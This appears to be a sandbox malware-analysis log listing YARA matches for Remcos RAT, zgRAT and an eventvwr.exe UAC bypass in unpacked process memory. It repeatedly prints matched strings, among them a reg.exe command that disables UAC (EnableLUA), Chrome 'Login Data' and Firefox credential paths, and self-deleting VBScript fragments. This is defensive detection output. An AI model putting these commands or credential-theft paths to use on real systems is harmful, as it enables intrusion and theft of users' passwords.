24.2.Qerdo.exe.5440000.4.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x5b6a2:$s1: file:/// 0x5b5fe:$s2: {11111-22222-10009-11112} 0x5b632:$s3: {11111-22222-50001-00000} 0x58303:$s4: get_Module 0x5841f:$s5: Reverse 0x59b22:$s6: BlockCopy 0x5a1a4:$s7: ReadByte 0x5b6b6:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
26.0.InstallUtil.exe.400000.8.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.0.InstallUtil.exe.400000.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
26.0.InstallUtil.exe.400000.8.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
17.0.InstallUtil.exe.400000.4.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.0.InstallUtil.exe.400000.4.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
17.0.InstallUtil.exe.400000.4.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
28.0.InstallUtil.exe.400000.5.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.0.InstallUtil.exe.400000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
28.0.InstallUtil.exe.400000.5.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
28.0.InstallUtil.exe.400000.3.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.0.InstallUtil.exe.400000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
28.0.InstallUtil.exe.400000.3.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
19.2.Qerdo.exe.48f0000.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
19.2.Qerdo.exe.48f0000.4.raw.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x5d4a2:$s1: file:/// 0x5d3fe:$s2: {11111-22222-10009-11112} 0x5d432:$s3: {11111-22222-50001-00000} 0x5a103:$s4: get_Module 0x5a21f:$s5: Reverse 0x5b922:$s6: BlockCopy 0x5bfa4:$s7: ReadByte 0x5d4b6:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
26.0.InstallUtil.exe.400000.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.0.InstallUtil.exe.400000.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
26.0.InstallUtil.exe.400000.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
19.2.Qerdo.exe.48f0000.4.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
19.2.Qerdo.exe.48f0000.4.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x5b6a2:$s1: file:/// 0x5b5fe:$s2: {11111-22222-10009-11112} 0x5b632:$s3: {11111-22222-50001-00000} 0x58303:$s4: get_Module 0x5841f:$s5: Reverse 0x59b22:$s6: BlockCopy 0x5a1a4:$s7: ReadByte 0x5b6b6:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
28.0.InstallUtil.exe.400000.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.0.InstallUtil.exe.400000.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
28.0.InstallUtil.exe.400000.2.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
26.0.InstallUtil.exe.400000.6.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.0.InstallUtil.exe.400000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
26.0.InstallUtil.exe.400000.6.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
26.0.InstallUtil.exe.400000.4.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.0.InstallUtil.exe.400000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
26.0.InstallUtil.exe.400000.4.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
17.0.InstallUtil.exe.400000.8.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.0.InstallUtil.exe.400000.8.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
17.0.InstallUtil.exe.400000.8.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
17.0.InstallUtil.exe.400000.2.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.0.InstallUtil.exe.400000.2.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
17.0.InstallUtil.exe.400000.2.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
17.0.InstallUtil.exe.400000.6.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.0.InstallUtil.exe.400000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
17.0.InstallUtil.exe.400000.6.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
28.0.InstallUtil.exe.400000.8.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.0.InstallUtil.exe.400000.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
28.0.InstallUtil.exe.400000.8.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x62094:$str_a1: C:\Windows\System32\cmd.exe 0x62010:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x62010:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x615f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61c50:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x611f4:$str_b2: Executing file: 0x621d8:$str_b3: GetDirectListeningPort 0x61a10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61c38:$str_b7: \update.vbs 0x6121c:$str_b9: Downloaded file: 0x61208:$str_b10: Downloading file: 0x612ac:$str_b12: Failed to upload file: 0x621a0:$str_b13: StartForward 0x621c0:$str_b14: StopForward 0x61be0:$str_b15: fso.DeleteFile " 0x61b74:$str_b16: On Error Resume Next 0x61c10:$str_b17: fso.DeleteFolder " 0x6129c:$str_b18: Uploaded file: 0x6125c:$str_b19: Unable to delete: 0x61ba8:$str_b20: while fso.FileExists(" 0x61731:$str_c0: [Firefox StoredLogins not found]
17.0.InstallUtil.exe.400000.3.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
17.0.InstallUtil.exe.400000.3.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
17.0.InstallUtil.exe.400000.3.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
26.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
26.2.InstallUtil.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
26.2.InstallUtil.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
28.0.InstallUtil.exe.400000.5.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.0.InstallUtil.exe.400000.5.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x60500:$s1: \Classes\mscfile\shell\open\command 0x60560:$s1: \Classes\mscfile\shell\open\command 0x60548:$s2: eventvwr.exe
28.0.InstallUtil.exe.400000.5.unpack	REMCOS_RAT_variants	unknown	unknown	0x61494:$str_a1: C:\Windows\System32\cmd.exe 0x61410:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x61410:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x609f8:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x61050:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x605f4:$str_b2: Executing file: 0x615d8:$str_b3: GetDirectListeningPort 0x60e10:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x61038:$str_b7: \update.vbs 0x6061c:$str_b9: Downloaded file: 0x60608:$str_b10: Downloading file: 0x606ac:$str_b12: Failed to upload file: 0x615a0:$str_b13: StartForward 0x615c0:$str_b14: StopForward 0x60fe0:$str_b15: fso.DeleteFile " 0x60f74:$str_b16: On Error Resume Next 0x61010:$str_b17: fso.DeleteFolder " 0x6069c:$str_b18: Uploaded file: 0x6065c:$str_b19: Unable to delete: 0x60fa8:$str_b20: while fso.FileExists(" 0x60b31:$str_c0: [Firefox StoredLogins not found]
28.0.InstallUtil.exe.400000.4.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
28.0.InstallUtil.exe.400000.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer	detects Windows exceutables potentially bypassing UAC using eventvwr.exe	ditekSHen	0x61100:$s1: \Classes\mscfile\shell\open\command 0x61160:$s1: \Classes\mscfile\shell\open\command 0x61148:$s2: eventvwr.exe
